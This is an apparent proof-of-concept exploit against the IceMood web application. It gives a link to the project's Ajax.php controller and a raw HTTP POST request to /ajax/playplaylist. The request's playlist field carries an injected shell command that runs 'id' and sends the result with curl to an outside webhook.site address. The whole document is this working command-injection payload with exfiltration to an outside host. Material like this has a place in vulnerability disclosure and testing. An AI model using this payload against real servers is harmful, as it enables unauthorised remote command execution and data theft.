https://github.com/swina/IceMood/blob/87594dfbf4dfeac2123fa050ef8e4cf37c892348/application/controllers/Ajax.php

POST /ajax/playplaylist HTTP/1.1
Host: xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Connection: close
Cookie: ci_session=xx
Upgrade-Insecure-Requests: 1
Content-Length: 91

playlist=$(curl -X POST https://webhook.site/63b7a012-f7c5-44f8-8a8f-4d683f11a55b -d $(id))
